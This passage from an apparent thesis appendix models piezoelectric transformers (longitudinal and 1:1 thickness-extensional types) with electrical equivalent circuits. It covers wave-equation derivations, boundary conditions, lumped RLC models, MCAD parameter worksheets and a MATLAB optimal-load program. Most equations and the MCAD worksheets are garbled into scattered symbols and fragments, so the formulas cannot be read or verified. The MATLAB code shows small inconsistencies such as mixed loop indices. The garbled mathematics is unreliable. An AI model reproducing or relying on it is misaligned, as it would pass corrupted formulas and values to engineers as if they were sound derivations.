l g j s Z g j s Z Z o o D o D o o D D E LC 1 11 11 2 3 11 11 4 11 11 5 11 11 6 tan sin ; sin ; ; tan sin ; ; . (A.50) Comparing (A.50) to (A.34), lets assume Z g j s E LC D 11 11 . (A.51) Then, (A.45) to (A.48) can be rearranged, to give ( ) ( ) ( ) ( ) ( ) ( ) $ ( $ $ ) $ ; $ tan sin $ sin $ $ $ $ ; $ tan sin $ sin $ $ $ $ . V v v Z I F Z j l Z j l v Z j l v v V Z v v F Z j l Z j l v Z j l v v V Z v v E LC o o o E LC o o o E LC + + _ , + + + + _ , + + + + 1 2 1 1 1 2 1 2 2 2 1 2 1 2 (A.52) Figure A.4. shows the basic equivalent circuit for the end-plated piezoceramics, and + g j s Z h W l g Y g Y D E LC D T D 11 11 11 1 11 11 2 1 1 ; (A.53) 153 Co 1 : V I + E _ + E _ I I Z 1 Z 2 Z 1 2 1 1 2 Lo Z j o sin Z 2 = l Z 1 = j Z o 2 l tan V v v Z I F F E LC + + ( $ $ ) $ $ 1 2 1 2 ( ) ( ) ( ) ( ) ( ) ( ) v Z j l v v V Z v v v Z j l v v V Z v v o E LC o E LC + + + + + + + + $ sin $ $ $ $ $ sin $ $ $ $ 1 1 2 1 2 2 1 2 1 2 j Z o 2 l tan j Z o 2 l tan g j s Z D E LC 11 11 1 l Z E LC j g s T D + _ , 11 11 2 11 A C Lo = 1 2 Co Z o Y D 11 A C A C : cross-section area = h W Co = j Z E LC 1 Fig. A.4. Basic model for the end-plated bar. An extra equivalent inductance, Lo, is added in the electrical system. 154 A.2.3 Complete Model For a longitudinal piezoelectric transformer, the side-plated bar is the input or driver part, and the end-plated bar is the output part. Theoretically, manufacturing these two portions in a piece of piezoceramic constitutes a longitudinal mode PT. However, the electrode for the end-plated bar located in the center of the PT had been placed in different positions for the purposes of manufacturing or insulation. Figure A.5. shows the insulated and noninsulated longitudinal mode PTs. The electrode, near the driver portion of the side-plated part is either shared with one of the electrodes of the driver or appears on the surface of the output portion. These arrangements will affect the performance of the longitudinal mode PT slightly [5]. Some terms related to continuum mechanics are explained first. Free at a surface means that this surface allows to vibrate freely; in other words, the force on the surface is zero. Physically, this surface is placed without any applied stress. Clamped at a surface indicates that displacement is zero at any point of the surface and the velocity is zero. According to continuum mechanics [46], the velocity is a continuous function of x 1 or x 3 , and is dependent on the selected coordinate. The complete equivalent circuit of the longitudinal mode PT is composed of the equivalent circuits of the side-plated bar and the ended-plated bar shown in Fig. A.3. and A.4, respectively. The following assumptions and boundary conditions are very important to constructing the model of the longitudinal PTs from two different model cells. 1. All the variables for the equivalent circuit of the side plated bar are added a prime, x , in superscript to distinguish them from those belonging to the end plated bars, for example: E I V and I etc 1 1 , , . 2. I I 2 1 or v v 2 1 at x 1 = 0 ; 3. E E 2 1 or F F 2 1 ; 4. E E 1 2 0 or F F 1 2 0 . The conditions 2 and 3 are essential to combining two different electrical networks together. The last statement is particularly important and illustrates that the ends of the longitudinal-mode PT are free from force. Since F F 1 2 0 is analogous to its electrical counterpart: E E 1 2 0 . The mechanical input port in Fig. A.3. for the side-plated bar and the mechanical output port in Fig. A.4. for the end-plated bar are shorted according to the definition from electrical network theory. Figure A.6 (a) shows the dimension of the complete longitudinal mode PT. In x 1 axis, the length of the side-plated bar is from -l to the origin. For the new boundary conditions, the equations for boundary velocities in section 2.2.2.1 change to 155 (a) Nonisolated type (b) Isolated type Side-plated bar End-plated bar Eout Ein Ein Eout Fig. A.5. Construction of longitudinal PTs. (a) nonisolated type. (b) isolated. The electrode, near the driver portion of the side-plated part is either shared with one of the electrodes of the driver or appears on the surface of the output portion. These arrangements will affect the efficiency of the longitudinal-mode PT slightly. The support points at nodes also affect the efficiency of PTs. 156 v u t v j B x 2 1 0 2 2 1 ; $ ; (A. 54) v u t v j B l B l x l 1 1 1 1 2 1 ; $ (( sin cos ) ; (A.55) B v j 2 2 . (A.56) The forces at both ends of the side-plated bar equal $ $ F Z B d A s E o E 2 1 31 11 3 ; (A.57) $ $ ; ( cos sin ) $ . F T A Z B l B l d A s E x l o E 1 1 1 2 31 11 3 1 (A.58) Because v v 2 1 , equating (A.54) and (A.17) gives B B 2 2 . (A.59) In order to meet all the boundary conditions required above, mismatching the physical dimensions in the driver and generator parts greatly reduces the complexity of the analysis [4]. This is a special case, looking for the solution of two separated mechanical systems. The mismatching makes it possible to obtain Z Z o o ' , (A.60) and l l . (A.61) From (A.57) and (A.42), condition 3 sets B B 1 1 . (A.62) 157 Since (A.59) and (A.62) hold, it means that the displacement is continuous at the boundary of the driver and receiver parts. Figure A.6 (b). shows the complete model of the longitudinal-mode PT when the ends of the PT are free of force. Its simplified model is shown in Fig. A.6 (c). by introducing -Y impedance transformation. The resultant model is suitable for all frequency ranges. If the frequencies of interested occur at resonance frequencies only, an L-C lumped equivalent circuit is found at every resonance frequency where l , , , 2 3 4 . Let this PT operate under the full wave mode, it means that the total length of the PT equals a wave length and l l By using Tylors series expansion, the impedance of the mechanical branch, shown in Fig. A.7 (a)., is expanded at o . ( ) f Z j l Z j l v f v l f v l v l f v l v l o o _ , + _ , _ , + _ , _ , + 1 2 1 2 1 2 2 tan tan (A.63) Assume the series resonance frequency is o , and o E v l l Y 11 (A.64) ( ) f Z j o o o 2 (A.65) Let = o + , and substitute it into (A.63) with only the first-order approximation: ( ) ( ) f f j Z o o o o + + 0 2 . (A.66) At the same time, the impedance of a series L m and C m is ( ) f j L C f f LC o o LC o LC o o ( ) ( ) ( ) _ , + ; (A.67) f f j L LC LC o m ( ) ( ) + + 0 2 . (A.68) 158 Ein = V' Eout = V x 1 x 3 - l' l 0 h' h W' W (a) Ein Eout Co Co' 1 : : 1 Lo Z 1 Z' 1 Z 2 Z 1 Z' 1 Z' 2 Iin Iin (b) Ein Eout Co Co' 1 : : 1 Lo Iin Iout (c) End-plated bar Side-plated bar ' Z j o sin l ' Z j o sin l j Z o 2 l tan 2 j Z o 2 l tan 4 Fig. A.6. Model and definition of dimensional variables of a longitudinal PT (a) dimensional definition. (b) combined model of the two basic cells. (c) DELTA to Y impedance transformation. In order to meet the boundary conditions of two basic model cells, a number of assumptions and boundary conditions need to be considered. 159 (a) Eout Co 1 : : 1 Lo Ein Co' j Z o 2 l tan 4 ' 1 2 Z o 2 l j tan (c) Eout Cd2 1 : N Ein Cd1 R L C (b) R Z Q m o m 4 L Z m o o 4 ( ) volume 1 4 C L m o m 1 2 Rm Lm Cm Eout 1 : : 1 Co Lo ' Ein Co' L Z o 4 o + L o ' 2 2 ' 2 C ' 2 o o Z 4 R ' 2 Q m 4 Z o Fig. A.7. Lumped model of the longitudinal PT. (a) dimensional definition. (b) combined model of two basic cells. (c) DELTA to Y impedance transformation. In order to meet the boundary conditions of two basic model cells, a number of assumptions and boundary conditions need to be considered. 160 Equating (A.66) and (A.68), L m is ( ) L Z A Y l Y volume m o o E E 4 4 1 4 11 11 ; (A.69) C L Z l W h Y m o m o o D 1 4 4 2 2 1 ; (A.70) R L Qm m o m . (A.71) The volume in (A.69) represents the volume of the end-plated or side-plated bar only. In other words, the volume here is approximately half of the piezoelectric transformer. The mechanical loss, R m , is calculated liberally according to the mechanical quality factor, Qm, and is shown in (A.71). The impedance in the center leg of the T-network in Fig. A.7 (a). is opened when the PT operates at its resonance frequencies. From (A.69) to (A.71), the equivalent circuit with lumped components for the PT operating at fs is shown in Fig. A.7 (b). The final equivalent circuit of the longitudinal mode PT is shown in Fig. A.7 (c) by reflecting the mechanical branch to the primary side of the model. A.3 Model of the Thickness Extensional Mode PT An 1:1 thickness extensional mode PT is composed of input and output broad plate piezoceramics, as shown in Fig. A.8 (a). If several pieces of piezoceramics are found in the output port and connected in parallel electrically, it is called a multilayer thickness extensional mode PT. When a sinusoidal electrical field is applied to the electrodes of a piezoelectric crystal, the latter will contract and expand along the thickness axis. As the frequencies of the electrical field approach the mechanical resonant frequencies of the piezoelectric crystal, the amplitude of the mechanical vibration within the crystal will become relatively large. Analogously, the induced amplitude of the electrical field will become large when the frequencies of the stress applied to the crystal approach its resonant frequencies. So, it is our objective to operate the PTs around their mechanical resonant frequencies to increase their efficiency. The analytical electromechanical wave motion of the PTs can be described by an electrical equivalent circuit in the neighborhood of mechanical resonant frequencies of the PTs. But it is not accurate enough to use inductor- capacitor networks to represent the mechanical resonance without considering the mechanical and dielectric losses. First, considering the mechanical loss, there are two ways to include the mechanical loss into the equivalent circuit of the PTs. One is to neglect the loss term when the wave equation is solved and then to add this loss to the respective LC networks [2,3], as shown in the previous section. The other method includes mechanical losses of the PTs in the beginning of the analysis, assuming that elastic constants are complex numbers [4]. However, these two 161 methods will lead to the same equivalent circuits with a mechanical quality constant, Q m . The latter method will be introduced here because this method provides a general way to incorporate the loss terms directly. (a) p p INPUT OUTPUT (b) l area (A) Iin F1 F2 V2 V1 Ein ( t ) Fig. A.8. 1:1 broad-plated PT. (a) construction and size. (b) its driver part. 162 A.3.1 Derivation of One-Dimensional Wave Equation The analytical solutions of the wave equations with boundary force conditions and the initial conditions can exactly disclose the displacement or wave-like motions inside the PTs. Taking the first derivative of the displacement, the strain is derived and the induced electric field is calculated. Hardly any physical interactions can be explained as well by equations as by electrical networks. Using a powerful network theory, the forces and the velocities, on the mechanical properties, are described as voltages and currents, respectively. The equivalent circuits of individual parts of the PTs can thus be combined into an electrical network having both electrical and mechanical characteristics. Following the same rules as those applied to the longitudinal PTs, the equivalent circuits for the PTs with the thickness vibration mode are derived in detail to establish a basis for the future investigation of the models of the stacked PTs. To simplify the analysis, an 1:1 broad plate PT [5] is selected for its high symmetry and one-dimensional operation in the thickness axis. If the turns ratios of the PTs are other than 1:1, an ideal transformer can be added. Assuming that the driver and receiver parts are identical so that symmetrical principles can apply to this PT, only one system equation needs to be derived for either the driver part or the receiver part. The following assumptions are made to obtain the electrical equivalent circuit of a 1:1 broad plate PT for the driver part: 1. lateral dimensions exceeding many wavelengths of sound, 2. no appreciable motion, except in the thickness direction, 3. description by a one-dimensional subscript of all stress, strain, electrical field, and current density, 4. loss-free insulation layers, 5. fundamental-mode operation, and 6. free motion in both end surfaces. So far, there are three types of piezoceramics introduced. The independent variables for the side-plated bar and the end-plated bar are [T,E] and [T,D], respectively. The dependent variables for broad plate piezoceramics are [S,D] because the lateral dimension exceeds length in thickness direction. Therefore, the circumference of the plate is actually clamped; S 1 = S 2 = 0, and S3 is chosen as one of the independent variables for electromechanical equations. And electric flux, D 3 , is the other independent variable for an insulating piezoceramic without any flux leakage. The resultant one-dimensional piezoelectric equations are T c S h D E h S D D S 3 33 3 33 3 3 33 3 33 3 + ; . (A.72) Figure A.8 (b). shows the driver part of a broad plate PT with thickness extensional mode vibration. The one-dimensional wave equation for a broad-plate piezoceramics is obtained by adopting a similar derivation in the previous section: 163 u t c u x D 3 2 2 3 2 3 2 . (A.73) Assuming that the electrical excitation is sinusoidal, D 3 = D O e jt , and c D is a real number, the general solution of (A.73) can be expressed as the following equation: u B x B x e j t 3 1 3 2 2 + ( sin cos ) , (A.74) where = frequency of the input voltage in rad/sec, c D , (A.75) v sound c D = speed of the sound, m/sec . (A.76) If c D is a complex number, the solution of the wave equation is a hyperbolic function rather than a sinusoidal representation: c c j c D D D + 1 2 , (A.77) u B x B x e j t 3 1 3 2 3 + ( sinh cosh ) , (A.78) where + + _ , j c c j Q m D D 1 1 2 , and (A.79) Q m c c D D 1 2 , mechanical constant. (A.80) In (A.78), B1 and B2 can be calculated and expressed as a function of velocities, v 1 and v 2 . v u t v j B x 1 3 0 1 2 1 ; $ ; (A.81) ( ) ( ) ( ) v u t v j B j l B j l x l 2 3 2 1 2 1 + + + ; $ ( sinh cos ; (A.82) 164 where $ $ v and v 1 2 are phasor representations of v 1 and v 2. . From (A.81)-(A.82), B 2 and B 1 are B j v 2 1 1 $ ; (A.83) ( ) ( ) ( ) ( ) ( ) B j j l v v j l j v j l v j l 1 2 1 1 2 1 1 + + + + + + sinh $ $ cosh ( $ tanh $ sinh ) . (A.84) A.3.2 Basic Model Cells The electrical properties, voltage and current, are obtained from (A.21). $ $ I j D h W 3 ; (A.85) ( ) ( ) ( ) $ $ $ $ $ $ $ $ $ $ , V E dx h S D dx h u u l D c g j v v Z I l D l x l x D D E LC + + + + 3 3 0 33 3 33 3 3 0 33 1 1 0 33 3 33 33 1 2 1 1 (A.86) where h c g 33 33 D 33 , and Z E LC is the clamped impedance and equals Z l j h W E LC D 33 . (A.87) Forces are function of velocities, v 1 and v 2 , and electrical current, I: $ $ ( $ tanh $ sinh ) $ ( $ tanh $ sinh ) $ ; F A c B A h D A c j v l v l A h I j A Z v l v l c g j I D D o D 1 33 1 33 3 33 1 2 33 1 2 33 33 1 + + + + + (A.88) 165 $ ( cos sin ) $ ( $ tanh $ sinh ) cosh $ sinh $ ( $ sinh $ tanh ) $ , F A c B l B l A h D A c j v l v l l v l c g j I Z v l v l c g j I D D D o D 2 33 1 2 33 3 33 1 2 1 33 33 1 2 33 33 1 + + + _ , + + + + (A.89) where Z A c j A c j Q o D D m _ , 33 1 1 2 . (A.90) Summarizing (A.86), (A.88), and (A.89), these equations can be rearranged to give ( ) ( ) ( ) ( ) ( ) ( ) $ ( $ $ ) $ ; $ tanh sinh $ sinh $ $ $ $ ; $ tanh sinh $ sinh $ $ $ $ . V v v Z I F Z j l Z j l v Z j l v v V Z v v F Z j l Z j l v Z j l v v V Z v v E LC o o o E LC o o o E LC + + _ , + + + + _ , + + + + 1 2 1 1 1 2 1 2 2 2 1 2 1 2 (A.91) Figure A.9 shows the basic equivalent circuit for a broad plate piezoceramics, and the turns ratio of the PT is c g j Z h W c g D E LC D D 33 33 33 33 33 1 l . (A.92) A.3.3 Boundary Conditions Figure A.8 (a). shows the construction of a thickness extensional mode PT whose step-down ratio is 1:1. Because the same materials and identical physical dimensions have been used for both driver and receiver parts, there is no mismatch required to have different sizes for them. The boundary conditions are the same as those required for a longitudinal mode PT. The prime system is used again to represent the variables in the driver part: 166 Co 1 : V I + E _ + E _ I I Z 1 Z 2 Z 3 2 1 1 2 Lo Z j o sinh Z 2 = l Z 1 = j Z o 2 l tanh ANALOG TO F F $ $ 1 2 v v $ $ 1 2 1 2 1 2 E I E I Lo = 1 2 Co l j A Z E LC S 33 h A 33 S Co = j Z E LC 1 = A : surface area = h W Co = j Z E LC 1 Z A c j o D 33 A c g D D 33 33 33 l Fig. A.9. Basic model cell of the broad plate piezoceramic. Because the mechanical loss is included in the model, the sinusoidal functions are replaced by the hyperbolic functions. The difference between this model cell and that of the end-plated bar results from using different independent variables in linear piezoelectric equations. 167 1. I I 2 1 or v v 2 1 ; 2. E E 2 1 or F F 2 1 ; 3. E E 1 2 0 or F F 1 2 0 . 4. Assume the presence of supporting points, which are located at the four corners of the bottom surface, will not hinder the vibration in the thickness direction. A.3.4 Complete Model Following the similar procedure for developing the complete equivalent circuit of the longitudinal mode PT, Fig. A.10 (a)-(c). shows the model of an 1:1 thickness mode PT. Generally, this is the model which is suitable to a wide range of operating frequencies. However, only the frequencies around the resonant frequency of the PT are of interest. Figure A.11 (a). shows the resultant equivalent circuit in Fig. A.10 (c). By using Tylors series expansion, the impedance of the mechanical branch in the middle of Fig. A.11 (a). is expanded at o , and is equal to ( ) ( ) ( ) ( ) ( ) ( ) f Z rl Z l v j Qm Z l f f f o o o o o o o o o _ , + + + tanh tanh tanh ( ) . 2 2 1 2 2 1 2 2 (A.93) Assume the series resonance frequency is o and ( ) o l ; (A.94) o D v l l c 1 ; (A.95) f Z e e Z e e Z Q Q Q o o l l o Q Q o m m m m m ( ) + + 1 1 1 1 2 2 2 4 2 2 ; (A.96) ( ) ( ) _ , + _ , + _ , _ , f Z e e j Q Z j Q Q Q Z j o o l l o m o o m m m o o 2 1 1 2 2 1 2 1 2 4 2 2 . (A.97) 168 Equations (A.96) and (A.97) can be simplified due to Q m >> 200 for the PTs. Let = o + , and substitute it into (A.93) with only first order approximation: ( ) ( ) ( ) f f f Z Q j Z o o o o m o o + + 4 2 . (A.98) ( ) f R j L C f f LC m m m o o LC o LC o o ( ) ( ) ( ) _ , + ; (A.99) f R f R j L LC o LC o m m ( ) ( ) + + + 2 . (A.100) Equating (A.98) and (A.100), a lumped equivalent circuit is shown in Fig. A.11 (b) and R m , L m , and C m are calculated as follows: R Z Q m o m 4 , (A.101) and ( ) L Z A Y l Y volume m o o D D 4 4 1 4 1 1 ; (A.102) C L Z l W h Y m o m o o D 1 4 4 2 2 1 , (A.103) where l is only half of the thickness of the 1:1 PT; accordingly, the volume in (A.102) is actually half of the real volume. Figure A.12. shows the final lumped equivalent circuit of the 1:1 PT when the mechanical branch is referred to the primary side of the PT. The calculated values of the equivalent RLC network are R Z Q o m 4 2 ; (A.104) L Z L o o o 4 2 2 ; (A.105) C Z o o 4 2 . (A.106) At the same time, the impedance of a series R, L and C is derived from (A.68) by adding an extra R. 169 (a) Ein Eout Co Co' 1 : : 1 Lo Z 1 Z' 1 Z 2 Z 1 Z' 1 Z' 2 Iin Iin (b) Eout Co Lo Iout (c) Output plate Input plate p p Lo' 1 : : 1 Z j o sinh l j Z o 2 l tanh 2 Z j o sinh l j Z o 2 l tanh 2 Ein Co' Iin Lo' Ein Eout Fig. A.10. Construction of the thickness vibration PT. (a) 1:1 broad PT. (b) combined model of two basic cells. ( c) delta-to-Y impedance transformation. Because input and output parts are physically identical, it is easy to get the complete model of this PT. 170 (a) Ein Eout 1 : : 1 Co Lo Co' Lo' j Z o 2 l tan 4 1 2 Z o 2 l tan Rm Lm Cm (b) Ein Eout 1 : : 1 Co Lo Co' Lo' R Z Q m o m 4 L Z m o o 4 ( ) volume 1 4 C L m o m 1 2 Fig. A.11. Lumped model of the thickness vibration PT around fs. The mechanical branch is represented by an Rm-Lm-Cm circuit operating around fs. 171 Eout Cd2 1 : 1 Ein Cd1 R L C R Z Q o m 4 2 C Z o o 4 2 L Z L o o o 4 2 2 Fig. A.12. Final Lumped model of an 1:1 thickness vibration PT around fs. A.4 Summary and Conclusion A study of electrical equivalent circuits for the PTs with regard to mechanical vibrations and related mechanical losses gives a better understanding of how the PTs work. The measurement results obtained from either impedance or network analyzer can be successfully used to verify the parameter values of the electrical equivalent circuit calculated from the physical size and material properties of an 1:1 PT. This work suggests that it is possible to design a stacked PT with any desired transformer ratio for different applications by using a simulation tool. In the future, the ANSYS finite-element software program will be used as a tool to verify the design of the PTs. 172 APPENDIX B : MCAD Program to Calculate the Physical Model of PTs B.2 Thickness extensional PT (LVPT-11) Engineering exponential identifier: Meg . 1 10 6 k . 1 10 3 m . 1 10 3 . 1 10 6 n . 1 10 9 p . 1 10 12 Pseudo-units to be used for constants and results: o . 8.854187 pico V 1 A 1 1 H 1 F 1 W 1 J 1 Hz 1 S 1 T 1 Wb 1 K 1 dB 1 N 1 mH . 0.001 H pF . pico F meter 1 cm . 0.01 meter dm . 10 cm mm . 0.1 cm km . k meter inch . 2.54 cm ft . 12 inch sec 1 kg 1 g . mkg PT constants: kt 0.51 33s . 211 1 kt 2 dielectric constant 33t = 211 33s = 156.119 c33d . 11.9 10 10 1 kt 2 elastic constant c33e=11.9 c c33d = c 1.608 10 11 kp 0.044 . 6900 kg meter 3 density g . 32.6 m piezoelectric constant tan 0.006 loss factor Qm 1200 the mechanical quantity Physical size of the PT (LVPT-11): Aa . 0.0004 meter 2 area of the PT la . 3.44 mm the total thickness of the PT - insulation Calculation of natural frequency when rl = : 173 vsound c vsound = 4.828 k fo vsound la fo = 1.043e6 o . . fo 2 Rm Lm Cm for the fundamental mechanical branch: Zo . . c Aa Zo = 1.333e4 Rm . Zo . 4 Qm Rm = 8.721 Lm . . . 0.125 Aa la Lm = 1.187 mH Cm . 2 la . . 2 Aa c Cm = 10.836 pF ft . 1 . LmCm 1 . 2 ft = 1.403e6 Value of the Parameters for the final equivalent circuit: h . c g h = 5.243e9 . . . Aa o h la 2 = 1.685 2 2 2 = 2.841 Cd1 . . 211 o Aa la 2 cd1 = 434.473 pF Lo 1 . o 2 Cd1 Lo = 29.598 R Rm 2 R = 3.07 L Lm 2 . 2 Lo L = 476.953 C . 2 Cm C = 30.783 pF ff 1 . . 2 . L C ff. = 1.313e6 174 APPENDIX C : Derivation of Resonant And Anti-resonant Frequencies Yin = G + jB R L C Cd The above figure shows the electrical equivalent circuit of the quartz and its input admittance Yin. The resonant and antiresonant frequencies are represented by r and a respectively. They are derived by equating the imaginary part of Yin to zero. ( ) Yin j Cd R j L j C j Cd j C L C j R C + + + + + 1 1 1 2 (C.1) [ ] Im Yin 0 , (C.2) therefore, ( ) ( ) ( ) ( ) j Cd L C R C j C L C + + 1 1 0 2 2 2 2 , ( ) ( ) ( ) ( ) Cd L C R C C L C + + 1 1 0 2 2 2 2 . (C.3) Let y = 2 , 175 ( ) ( ) ( ) 1 1 0 2 2 + + y L C y RC C Cd y L C ; (C.4) ( ) ( ) y L C RC LC C Cd L C RC LC C Cd L C L C C Cd LC C Cd R C L C Cd R C L R C L C Cd _ , t _ , + _ , _ , + t _ , _ , _ , 1 2 2 2 4 1 1 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 (C.5) Let x = R 2 , the first order Tylor series expansion of y at x = 0 is y y x x x . (C.6) LC 0 1 , (C.7) where the sign is - in (C.5), or y L C Cd + _ , 0 1 1 . (C.8) y x LC C L C Cd R C L R C L C Cd C L R C L C Cd R C L C L _ , + _ , _ , _ , + _ , _ , _ , 1 2 1 2 2 2 2 2 2 2 2 2 2 2 2 2 0 5 2 2 m . . (C.9) y x LC C L C Cd C L C Cd x _ , _ , _ , _ , 0 1 1 2 1 2 2 2 2 m . y x LC C L Cd C C L C Cd Cd L C x _ , _ , _ , _ , 0 2 1 2 1 2 2 2 2 , (C.10) where the sign is -in (C.5), or 176 y x LC C L Cd C C L C Cd Cd L C C Cd x + _ , _ , _ , _ , _ , 0 2 1 2 1 2 2 2 2 1 . (C.11) According to (C.6), combining (C.7) and (C.10) makes y LC R L Cd r + _ , 2 2 1 1 . (C.12) When the sign is + in (C.5), ( ) y LC C Cd R L C Cd a + + _ , 2 2 1 1 1 . (C.13) 177 APPENDIX D : MCAD Program to Calculate the Equivalent Circuits of PTs D.1 Longitudinal PT (HVPT-1) Engineering exponential identifier: Meg . 1 10 6 k . 1 10 3 m . 1 10 3 . 1 10 6 n . 1 10 9 p . 1 10 12 Measurement results for 2nd mode operation: (a) output is shorted: Ct . 848.5 p fs 67054.25 fp 68597.5 Gmax 0.0146088 fr 67055 fa 68595 r 1 Gmax (b) input is shorted: Ct . 8.75 p fs 67079.625 fp 73275 Gmax2 0.0004904 fr2 67079.875 fa2 73282.5 Calculation results for 2nd mode operation: keff2 fp 2 fs 2 fp 2 cd1 . fs 2 fp 2 Ct c . keff2 Ct l 1 . ( ) . . 2 fs 2 c = cd1 810.7517 p = c 37.7483 p = l 0.1492 = keff2 0.0445 keff fp 2 fs 2 fp 2 Cd1 . fs 2 fp 2 Ct c . keff Ct l 1 . ( ) . . 2 fs 2 c cd2 Cd1 = c 1.4171 p = l 3.9725 = keff 0.162 n c c n1 l l n3 Gmax Gmax2 = cd2 7.3329 p n = 5.1612 n1 = 5.1593 n3 = 5.458 r = 68.4519 178 D.2 Thickness extensional PT (LVPT-21) Pseudo-units to be used for constants and results: o . 8.854187 pico V 1 A 1 1 H 1 F 1 W 1 J 1 Hz 1 S 1 T 1 Wb 1 K 1 dB 1 N 1 mH . 0.001 H pF . pico F meter 1 cm . 0.01 meter dm . 10 cm mm . 0.1 cm km . k meter inch . 2.54 cm ft . 12 inch sec 1 kg 1 g . mkg Measurement results for 2nd mode operation: (a) output is shorted: (b) input is shorted: Gmx2 . 0.4493 S = 1 Gmx2 2.22568 Gmxr2 1.6078 fs21 . . 1860.25 k Hz = 1 Gmxr2 0.62197 fs22 . . 1860.25 k Hz fr21 . . 1860.75 k Hz fr22 . . 1860.5 k Hz fa21 . . 1937.25 k Hz fa22 . . 1937.25 k Hz Ct21 . . 2830 pico F Ct22 . . 10320 pico F Calculation results for 2nd mode operation: Cd1 . fr21 2 fa21 2 Ct21 C2 Ct21 Cd1 L2 1 . C2 ( ) . . 2 fs21 2 Cd2 . fr22 2 fa22 2 Ct22 C2n Ct22 Cd2 L2n 1 . C2n ( ) . . 2 fs22 2 fs 1 . . 2 . L2 C2 N2 L2 L2n N2c C2n C2 N2r Gmxr2 Gmx2 fs = 1860.25 k N2 = 1.91267 N2c = 1.91267 N2r = 1.89168 Rcd1 1 . . . . 2 fs Cd1 0.006 Rcd1 = 5.461 k Rcd2 1 . . . . 2 fs Cd2 0.006 Rcd2 = 1.498 k Equivalent circuits of spurious vibrations: (a) fsm = 1835 kHz Gsmax 0.15455 fm45 1834000 fp45 1836000 fss 1835250 rsm 1 Gsmax rsm 6.4704 csm . 1 . . 2 rsm fp45 fm45 . fp45 fm45 c sm = 14.610 pico lsm . rsm . 2 1 fp45 fm45 lsm = 0.5149 m 179 (b) fsm = 1891 kHz Gsmax 0.072378 fm45 1890500 fp45 1894250 rsm 1 Gsmax rsm = 13.81635 csm . 1 . . 2 rsm fp45 fm45 . fp45 fm45 csm = 12.06269 pico lsm . rsm . 2 1 fp45 fm45 = lsm 586.38423 fs . fp45 fm45 fs = 1892.374 k (c) fsm = 1943 kHz Gsmax 0.01731 fs 1942250 fm45 1939500 fp45 1947000 rsm 1 Gsmax rsm = 57.77008 csm . 1 . . 2 rsm fp45 fm45 . fp45 fm45 csm = 5.47171 pico lsm . rsm . 2 1 fp45 fm45 lsm = 1.22592 m 180 APPENDIX E : MATLAB Program to Calculate the Optimal Load of PTs % Program list for power flow method for LVPT-21 clear % input section pt213189 % measured S-parameters from network analyzer ii=sqrt(-1); Rload=9.8; % assumed load of the PT Lload=450e-9; % lumped model of LVPT-21 fs21=1860250; R=2.225; C=219.09e-12; % C=199.09e-12; L=1/C/(2*pi*fs21)^2; % L=36.766e-6; cd1=2211e-12; cd2=9518.4e-12; nc=1.913; rcd1=5461; rcd2=1498; % measurement from spurious vibrations fs211=1835000; R4=6.47; C4=14.6099e-12; L4=1/C4/(2*pi*fs211)^2; % L4=586.38e-6 181 fs217=1892374; R7=13.81; C7=12.06269e-12; L7=1/C7/(2*pi*fs217)^2; % L7=440.2e-6 fs218=1943246; R8=57.77; C8=5.472e-12; L8=1/C8/(2*pi*fs218)^2; % L8=0.0012 % calculation of the optimal load employing the lumped model for i= 1:601 im=i+200; f(I)=sm(im,9); w=2*pi*f(I); yload=1/(Rload+ii*w*Lload); % Load admittance % directly calculate y11, y12, y21, y22 zs2=R+ii*w*L+1/w/C/ii; zs4=R4+ii*w*L4+1/w/C4/ii; zs7=R7+ii*w*L7+1/w/C7/ii; zs8=R8+ii*w*L8+1/w/C8/ii; zs=1/(1/zs2+1/zs4+1/zs7+1/zs8); z11=1/(1/rcd1+ii*w*cd1); z22=1/(1/rcd2+ii*w*cd2); y11=1/z11+1/zs; y12=-nc/zs; y21=y12; y22=1/z22+nc*nc/zs; c=abs(y12*y21)/abs(2*real(y11)*real(y22)-real(y12*y21)); % c: Linvill constant x=-1/c+sqrt(1-c^2)/c; lk(i)=1-x*real(y12*y21)/abs(y12*y21); mk(i)=imag(y12*y21)*x/abs(y12*y21); cck(i)=c; kk=-y21/2/real(y22); phi2=(lk(i)+ii*mk(i))*kk; sin=y11+phi2*y12; % input power yin(i)=sin; % input admittance ( vin =1 ) rin(i)=1/real(sin); 182 cin(i)=imag(sin)/2/pi/f(i); pin(i)=real(sin); % input real power qin(i)=imag(sin); % input reactive power gammal=2*real(y22)/(lk(i)+ii*mk(i))-y22; yoptk(i)=abs(gammal); % calculated optimal load ayoptk(i)=ANGLE(gammal)/2/pi*360; zl(i)=real(1/gammal); ll(i)=imag(1/(gammal)/2/pi/f(i)); zlp(i)=1/real(gammal); llp(i)=-1/imag(gammal)/2/pi/f(i); sout=abs(phi2)^2*gammal; % output power eff(i)=real(sout)/real(sin); pout(i)=real(sout); % output real power qout(i)=imag(sout); % output reactive power vgain(i)=abs(y21/(gammal+y22)); % voltage gain under optimal load y11c=1/z11+1/zs; y12c=-nc/zs; y21c=y12c; y22c=1/z22+nc*nc/zs; y11k(i)=abs(y11c); gfk(i)=real(y11c); bfk(i)=imag(y11c); angle=atan2(bfk(i),gfk(i)); anglek(i)=angle/2/pi*360; y22k(i)=abs(y22c); gbk(i)=real(y22c); bbk(i)=imag(y22c); yinldc=y11c-y12c*y21c/(yload+y22c); % input admittance for yload pinldc=real(yinldc); vldc=-y21c/(yload+y22c); poutldc=abs(vldc)*abs(vldc)*real(yload); rinldk(i)=1/real(yinldc); cinldk(i)=imag(yinldc)/w; yinlk(i)=abs(yinldc); ayinlk(i)=ANGLE(yinldc)/3.14165*360; pinldk(i)=pinldc; poutldk(i)=poutldc; effldk(i)=poutldc/pinldc; 183 vgainldk(i)=abs(vldc); % voltage gain under yload y11c=y11c*50; y12c=y12c*50; y21c=y21c*50; y22c=y22c*50; ky=1/((1+y11c)*(1+y22c)-y12c*y21c); s11=ky*((1-y11c)*(1+y22c)+y12c*y21c); s12=-2*ky*y12c; s22=ky*((1+y11c)*(1-y22c)+y12c*y21c); s21=-2*ky*y21c; s11k(i)=20*log10(abs(s11)); s21k(i)=20*log10(abs(s21)); s22k(i)=20*log10(abs(s22)); % calculation of the optimal load employing two-port parameters s21f(i)=sm(im,3); sm(im,1)=10^(sm(im,1)/20); sm(im,3)=10^(sm(im,3)/20); sm(im,5)=10^(sm(im,5)/20); sm(im,7)=10^(sm(im,7)/20); s11=sm(im,1)*exp(ii*sm(im,2)/180*pi); s21=sm(im,3)*exp(ii*sm(im,4)/180*pi); s12=sm(im,5)*exp(ii*sm(im,6)/180*pi); s22=sm(im,7)*exp(ii*sm(im,8)/180*pi); s21m(i)=20*log10(abs(s21)); 